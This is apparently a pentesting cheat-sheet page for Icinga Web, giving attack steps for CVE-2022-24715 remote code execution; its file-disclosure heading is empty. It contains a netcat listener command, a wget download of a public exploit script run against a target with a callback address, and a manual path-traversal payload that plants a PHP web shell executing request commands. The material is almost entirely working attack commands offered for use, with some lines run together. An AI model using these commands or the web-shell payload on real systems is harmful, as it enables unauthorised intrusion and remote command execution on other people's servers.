Icinga Web Pentesting
Remote Code Execution (CVE-2022-24715)
Automation
nc -lvnp 4444ssh-keygen -m pem
# Location: cert.pem
# Passphrase: (empty)
wget https://github.com/JacobEbben/CVE-2022-24715/blob/main/exploit.py
python3 exploit.py -t http://example.com/icingaweb2/ -I <local-ip> -P 4444 -u username -p password -e cert.pemManual Exploitation
ssh-keygen -m pem # Location cert.pem # Passphrase: (empty)[Resource Name] evil [User] ../../../../../../../../../../../dev/shm/run.php [Private Key] <PEM_PRIVATE_KEY> \x00<?php system($_REQUEST["cmd"]);?>
Arbitrary File Disclosure (CVE-2022-24716)
References
Last updated